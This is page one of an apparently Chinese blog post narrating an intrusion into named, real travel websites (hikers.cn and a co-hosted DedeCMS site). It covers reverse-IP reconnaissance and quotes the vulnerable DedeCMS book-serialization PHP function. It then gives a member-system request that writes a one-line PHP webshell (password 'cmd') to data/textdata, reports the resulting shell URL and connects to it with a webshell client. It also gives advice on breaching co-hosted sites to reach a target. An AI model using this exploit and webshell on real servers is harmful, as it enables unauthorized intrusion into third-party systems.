大家好，有好长时间没有写检测方面的文章了。今天，受朋友之托检测一个网站，下面和大家一起分享其中的检测过程，希望大家能在文章中学到一些东西。开始我们的检测之旅吧!

　　一、剑行直下

　　今天要检测的网站叫中国户外旅游网，网站网址是http://www.hikers.cn/，网站主要是为全国各地网友寻找全球最优秀生态旅游景区，其实就是为户外运动、旅游提供说明指导的网站。我们先来看看网站结构，网站有论坛、blog、网址大全、机票、酒店、度假等模块，其中论坛用的是dz6.0论坛，听说dz6.0有0day，可惜我是穷人买不起0day，论坛大致看了下没办法入手。再看看blog程序，晕!blog打不开，无语。再看看网址大全，也没发现什么问题。机票、酒店、度假这三个模块全是链接的携程网，再次无语。剩下只有网站的新闻系统了，看看了新闻系统，全部生成的静态页面，而且还没发现它新闻系统使用的什么程序，郁闷中。看样子剑行直上没有办法了，那我们来看看服务器上的其它网站，来一次剑走偏锋吧!

　　二、剑走偏锋

　　首先，我们来查查这个服务器上放了多少个网站，服务器IP地址是222.216.28.235，通过ip域名查询网站http://www.seologs.com/，我们得知服务器上存放了5个站点。        

　　                                                                 图1

　　这个站原来有一段时间不能用，是因为国内查询的人太多了，屏蔽了国内IP，如果以后大家碰到不能查询的情况，可以用国外IP代理查询。

　　根据我的经验，这台服务器上只放了5个站，应该是网站建设者自己在经营和维护，这种服务器的权限设置比那种放了上百个域名的虚拟主机权限差的多，提权成功率也比虚拟主机的高，当大家碰到一查询就是上百个域名的虚拟主机时，能从主站入手就想办法从主站入手，旁注即使能成功，也很难拿到主站的权限。旁注是无奈之举，能直接拿主站就从主站入手，旁注是最后的办法，大家一定要记住。

　　我们来认真看看51maihuo.com和uutxx.com这两个站，打开一看才发现这两个域名都是同一个站，这个网站是个介绍美食的网站，大致看了下，也没发现什么问题，而且还没弄明白用的什么程序，此时非常郁闷。冷静的想了一会，这个服务器上不应该只有两个网站啊，换了个ip域名查询网站http://www.114best.com/，查询结果显示，除了上面两个网站外，服务器上还有一个网站。

                                                                              　　图2

　　网址是http://www.travelren.net，网站主要是介绍旅游线路以及旅游景点。网站布局好像有点似曾相识的感觉，好像是织梦内容管理系统，马上在网址后面加上member，出现了用户登录框。

                                                                                          　　图3

　　果然是织梦内容系统，这段时间织梦爆出了漏洞，我在本地测试过几次，我说布局怎么这么熟呢!最近织梦内容系统刚爆出过一个写入网马的漏洞，前提是服务器开放会员系统，而且有图书连载里有类别。漏洞文件出现在include\inc_bookfunctions.php文件中，代码如下：

function WriteBookText($cid,$body) { global $cfg_cmspath,$cfg_basedir; $ipath = $cfg_cmspath."/data/textdata"; $tpath = ceil($cid/5000); if(!is_dir($cfg_basedir.$ipath)) MkdirAll($cfg_basedir.$ipath,$GLOBALS ['cfg_dir_purview']); if(!is_dir($cfg_basedir.$ipath.'/'.$tpath)) MkdirAll($cfg_basedir.$ipath. '/'.$tpath,$GLOBALS['cfg_dir_purview']); $bookfile = $cfg_basedir.$ipath."/{$tpath}/bk{$cid}.php"; $body = "<"."?php\r\n".$body."\r\n?".">"; @$fp = fopen($bookfile,'w'); @flock($fp); @fwrite($fp,$body); @fclose($fp); } member\story_add_content_action.php WriteBookText($arcID,addslashes($body));

　　中代码中我们可以看到，只是用addslashes进行了转义。但是$body = "<"."?

　　php\r\n".$body."\r\n?".">";很明显可以写入一个小马的。

　　我们先来访问http://www.travelren.net/member/index_do.php?fmdo=user&dopost=regnew注册一个新用户，然后，利用注册的新用户登录，会员系统图书连载里有类别，马上提交，

　　http://www.hikers.cn/member/story_add_content_action.php?chapterid=1&arcID=2&body=?>]);?>

　　就会在data\textdata\目录下生成小马，默认为data\textdata\1\bk1.php，如果有人利用过这个漏洞，每提交一次文件名就会加一，经过我测试我上传的小马地址为http://www.hikers.cn/data/textdata/1/bk9.php，网马为lanker一句马，密码为：cmd，我们来用lanker客户端进行连接。

                                                                                       　　图4

[1] [2] 下一页